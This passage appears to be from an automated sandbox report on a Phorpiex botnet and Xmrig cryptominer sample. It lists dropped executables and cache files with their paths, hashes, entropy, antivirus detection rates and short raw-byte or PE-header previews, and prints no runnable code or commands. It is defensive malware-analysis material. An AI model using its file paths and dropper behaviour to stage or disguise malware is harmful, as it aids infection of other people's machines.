                                                                            ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                              T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                  Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                    bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                      file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                        dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                          GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                            0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                              C:\Users\user\AppData\Local\Temp\1088610392.exeU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                  T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                    lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                      Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                        bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                            dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                              GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1224321169.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1224321169.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):425
                                                                                                                  Entropy (8bit):5.357964438493834
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                  MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                  SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                  SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                  SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\2[2]

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10496
                                                                                                                  Entropy (8bit):7.984469394998947
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:aAnkxbr7XNTQwFtSiiFh1eBtpQ9dys4Hcbnvsi3i9FS0swDNC6:aAkxbre0gBFh1xdyCjzWd
                                                                                                                  MD5:2266F0AECD351E1B4092E82B941211EA
                                                                                                                  SHA1:1DCED8D943494AA2BE39CA28C876F8F736C76EF1
                                                                                                                  SHA-256:CBBAD0AB02CD973C9C4E73336E3BCD0849AEB2232A7BDBC38F0B50696B5C28C3
                                                                                                                  SHA-512:6691CD697BBE7F7A03D9DE33869AAB289D0A1438B4EE194D2047DED957A726B1D3FE93F08E4A0C677018B20E2521AEB021AB1DC4D1A67927604829DDFD9D59AA
                                                                                                                  Malicious:false
                                                                                                                  Preview:..|.@vC)...q.9....K.{>...d8..'.s.....J.......Pn..k.V.z...@W....L{..uG.'G1.CL..@...<B..6..;.>hM..\..|w.B.v.....u.g...OX.%. .h.r9:|....s..<.6.).g..4GlY...2Bf.5...A..+G....(.T-oE..Z.I23.{..'3...)`...^e7jz/M$s......4....*16..m..frn..DD,......Wa(.2.D..9...........x..........Zk4Da...)?.._h...sA..W.....B2.....cHQ.T....=..U...@.3.}....!...Y.G.C...X{... 4"...&..h.0..'xu..#.c.|g...L0....)...c..M...]....oL{...:En:?.|_X.P.........Q@. .3...o.....).u..a..[...I...+....f....Z.M..%. ].2.uz._......Gw....t.0b........Fa....MT.d..2.Y....&....T............M..X...P......}..+.....Op..Q.E.o6R;.P..>8`2.'".....~C..Z_.........,.2g.. $..l....."x...:.h;..H...........`.$-6....._-e...C?.6T..=..q...L...3.&fG)..W..G..@6.X~.%X....%R...C.h..?R...]......f...bU!.PH..h...".......R...j,d.k......e..\....~.h..n(.....,.G...<...u.1....6t......l.....w;..p..;y..rSC....._.M....6.X....h..t.G7zs..HP,e_d.d.c.n..^.M+ct\0j.r.>;......_n.q.>.x.e.z...w...o...%kkw..Fg..A/.cS..Q./=cj.

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1]

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55040
                                                                                                                  Entropy (8bit):7.997475461755616
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:jhoc380tcdgHrN0ymXg+43D/c+DR7wM2UrMg01LS+:j+c380tLC143D5F7PILD
                                                                                                                  MD5:6EEB3A61EA7F8C560BA8580AD03C7F4F
                                                                                                                  SHA1:8B72E9120292E356A3D48C1AF143E4CFF3B45D05
                                                                                                                  SHA-256:5E9CF6BB5E09411196A31E750E8CD3028EE3ECCE24B97F010255B701B11E4AE6
                                                                                                                  SHA-512:F6F32A9E249C7E6C7B630DC7F8FEA94EEEF26C04BD1BDB86C385BE8495F890F5A9D11E8D635DEB043AD4328E515F4090DE437190AEE410EAA72568CA2128BA43
                                                                                                                  Malicious:false
                                                                                                                  Preview:..'....."YbI.r.^lB_....QMx=^w(^..:X:.....'...JO..3..k...>#>.~.BH....s.}.e.f&@..t....e."U...hK.HW..If.\]..|.A.T.s .Z...X.F.....f...l..S.~....;._..o.C......H..]../...........+.i.<..i.....c....V.\.z_ 3....H..~U,V.U.r.PeA.#...@7P.....`NY.[. ..+.&.N...x.~I...............D...B...........\..../...n..(+25v..6.j..L.%8\.^?].........x..Z.I..>....r..i....[.@....s..:...p......2y..O6...Q.`.L,..h=.8....K.LK.Z.qaY.=7"N...5)../......I&..O.......s}......,D..>.)A.S..7.....r..Ep.gs..I.u.V`...'.A$..]`\.c.3.)...x.e....uW=..Y..."!..-/...if{.":...B....K.s.W..........c%r.W.......&..d...J...+.g.....4...a....`2.....i=.P....p*.k.s@.?...w....CamFyN7.y..]Mg<...|..s.mCv.....D..O^....._.5...Nj.X.>...,..aF.:.S..1x...Sg.s.P..._....z.....(..F..H........O............g......Zc..lx...I.q..{....FQ.=...........K...3....-k.F...I'~.6.e.K..L...X .1:.Y...O.]S..^mp.k..Eb.W.X.c.F.!w..U4...W.].RH..T..cw.kx.........bZ.m...#...&...<.r_.Ee...:..ga.P.#_..(3tj.O.;..V.*..(.:.o?:5-Sy~..V...(5

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\1[1]

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8960
                                                                                                                  Entropy (8bit):7.980118959451248
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
                                                                                                                  MD5:39F45EDB23427EBF63197CA138DDB282
                                                                                                                  SHA1:4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
                                                                                                                  SHA-256:77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
                                                                                                                  SHA-512:410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
                                                                                                                  Malicious:false
                                                                                                                  Preview:$.g.r5].F.M[..o.I.........5.Eb....L6,.i%.kZ.....8....ePI|.....<..iq....#.......O@5..U|*{`)...].H........x..-..dR~A.}"2......... +.(.*.R.m....d...!..(...$..5.t...F.]...<.g"...V.(1}.]C........s3..76..&...Ic...%t..h.I.b.....R(......}..IE...<.....]..C.....9....xi|........../.....>y..4m..3..hO.....;...<.|..5.,.0.tA`.J..Nn;.w.es...q.T.._...:<....fb7..J.H.3&. ...f..1.F.G.c..&k..,J..x+..c.`.w....s....~.........(s..F..IT...,....5\.).}..-..@........4.>a.u...e.\..v.=.I.kB..[..Q...2..c.LA.lT..rO.....U.Y..*m.j#.u...U..P...>.Y{,...Tk....3.h.,v..)..P.TK3_.+..+....m..NP[..qe.......G9.f..|........[.-&M~&..14w.._.l.a./.ok...w.M.._...w..^7Rgg....%.Tv...}....T..p...;d.Su..z.FPH...Z....I...pz5...0g..`..l..K\V3...t..r.y.l...2..R.]?cz.m....v....o.......\. ....0.o.N3.a.P..V.=BE\..... _.^hV.f.\*..n.$0..q.C........7..BQ.n...}c..../.Yd=.G...-.....T.Sx..&...z.wi...:...,.a..........o.ou....Hn...8....Zx...............F^=R...nU.T.D9.'.W..L.dPi.^`ZBj..2.....z.\.

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\3[1]

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):63232
                                                                                                                  Entropy (8bit):7.997234577455722
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:Rb6G5CuemZ88BNRpjVsWAtKhKqjWfD8L4/MKALBEBtiElxxaH4+HeXw:RHeL8BfatK/K8kXANr6jmf
                                                                                                                  MD5:42680A341BA5D6CF2013FF1F5A3039F1
                                                                                                                  SHA1:BCF24346BA857DC8DFFA7C7FF369359FB9969966
                                                                                                                  SHA-256:CD1D10AF836743F1EE93A0CA03D8072D8FC5C44022C846809C5E0482228D6E04
                                                                                                                  SHA-512:89FE01D9EAEFF01E73D4AD11473DADAFCC7CB2DEB6C8BA98B7C64158C120F45E4134F70DCC17004B506E2A0D783CEDE797DBE5850AAA91C79402BA54C80FCB34
                                                                                                                  Malicious:false
                                                                                                                  Preview:3........-;.)V..........X.....*\.Z.^S....,n..q....h. I.....e...;Zz.8'.....4F..Ar..a=X.6O4.3f..b.-.\uu. .y7...........0p\k..,...NXn8....0...4e.I...O.D.Dda...Fq..2._UO....7.w.k.......Nl.....cH..k=.kRd..-07<.x..a\......Y..2J...Y.i..?...s..Vb.h\.../.'.=.;..._....9..M.S*..;.f.......x.;{l.B@,..L.F.?.w.1.b.CV}....7...=..s/..pQ.[....Gm.+P.3]..1....Y[)..e...=t.|..*wOQ.;}GF...:.m. ...k.'.....h.....:.....r...g.rM$...wyg...S.....^.`.3s....^Ye.2..55.4.K.J.L!............j.^R4.o6g........?....{.....x..}.iX........1?r.W.-m..4.v....&n...%...l:_y.....Na.u..T...}..T....!..........V.9D.K.LM.9..#.,f...\.c...^.870.(7.A.V.B..4.s..y..m....E.$............I...R.H.....F'!....,..a........'.s..\$.q...HV...[*..9..R..Sr..zKI7.4...Hy.N.tnC. wY.8I.h..6....;>.E.D...b..y..EWI..c.h.P&="1."......'...R.;.....a_-U.y./....2....4(s...u....QyG.O.8...........`.)u3g9lW2.(.P>2.^'..r.{..g_.....!0i.....-.(bg...T...?J.f.il.C2`.-.N..=TM....[..........1.a..@... .#o;...R.`_....

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\2736615137.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5827584
                                                                                                                  Entropy (8bit):7.718261688436852
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                  MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                  SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                  SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                  SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ukOlLduCBM.exe, Detection: malicious, Browse
                                                                                                                  • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                                                                                  • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                                                                                  • Filename: bBcZoComLl.exe, Detection: malicious, Browse
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                                                                  • Filename: GGXhCiYFBw.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 0NSjUT34gS.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\1088610392.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\2736615137.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5827584
                                                                                                                  Entropy (8bit):7.718261688436852
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                  MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                  SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                  SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                  SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: U9jAFGWgPG.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ukOlLduCBM.exe, Detection: malicious, Browse
                                                                                                                  • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                                                                                  • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                                                                                  • Filename: bBcZoComLl.exe, Detection: malicious, Browse
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                                                                  • Filename: GGXhCiYFBw.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 0NSjUT34gS.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\1224321169.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8704
                                                                                                                  Entropy (8bit):5.0125514402992275
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
                                                                                                                  MD5:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                  SHA1:416FC65D538D3622F5CA71C667A11DF88A927C31
                                                                                                                  SHA-256:5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                                                                                                                  SHA-512:BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(....*....4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&..*..........66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....

                                                                                                                  C:\Users\user\AppData\Local\Temp\191563587.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):54784
                                                                                                                  Entropy (8bit):4.675239815183201
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:m9WM1/0vaXDiTLlGCI0App3A7Kph6koM6qsq:thEiTLXA3wWp4kopv
                                                                                                                  MD5:B92AD7E3C510355DD54DB74CDF4D522E
                                                                                                                  SHA1:BF4E93257363AA26D02A2CAFD1805566923B7EF4
                                                                                                                  SHA-256:42A3D89601AFFBF702B44E56746F2FF19308848E49BA0FAE86202345AB19C95F
                                                                                                                  SHA-512:1462EBF284A4D20900AEC239449693E5D5C73CFD1283D8A4AEDC293F82B0B7EE3BC66AA3FDD916377C2E00F64212CE71E455FDDD3B960C9DE1C88B3886DDC388
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3P..w1..w1..w1..P...}1..~IS.t1..w1.."1..~IU.u1..~IC.b1..~ID.t1..~IQ.v1..Richw1..........................PE..L.....Gg............................D#.......0....@..................................H....@.....................................................................d......................................@............0..l............................text............................... ..`.rdata..4|...0...~..................@..@.data....'......."..................@....rsrc...............................@..@.reloc.."...........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\204078699.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):62976
                                                                                                                  Entropy (8bit):3.8463342467781225
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:dQQ4VsFTmMdMdMdMdMdMdMdMdMoMdMdMdMdMdMdMdMdMnMdMdMdMdMdMdMdMdMoU:WQyQ
                                                                                                                  MD5:77C5EB90118287F666886FC34210C176
                                                                                                                  SHA1:D7A59BF4F014304E29DF1868EF82FE782432120A
                                                                                                                  SHA-256:59A96D66D97E202829EA79A5E0BBF71981C05A13AB700B0120F7D99D33515080
                                                                                                                  SHA-512:5577D167AD4748AD7917FF3F792A0CAA01BA40638BDF7143C1403D2EFCAD4019F8DA49719AE0AD88FEBDC1EF64207FBA7CA5BB96DC12C334571D30E2E8F22CF9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L....~Ig............................O........ ....@..........................0......'.....@.................................,#..x............................ ..\...................................h"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@..@.reloc..6.... ......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\2736615137.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10240
                                                                                                                  Entropy (8bit):5.134070469138298
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
                                                                                                                  MD5:96509AB828867D81C1693B614B22F41D
                                                                                                                  SHA1:C5F82005DBDA43CEDD86708CC5FC3635A781A67E
                                                                                                                  SHA-256:A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
                                                                                                                  SHA-512:FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azvsmxg2.qcn.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwvt0qav.3az.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1xrbeaw.ygt.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnic4oz3.kgv.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
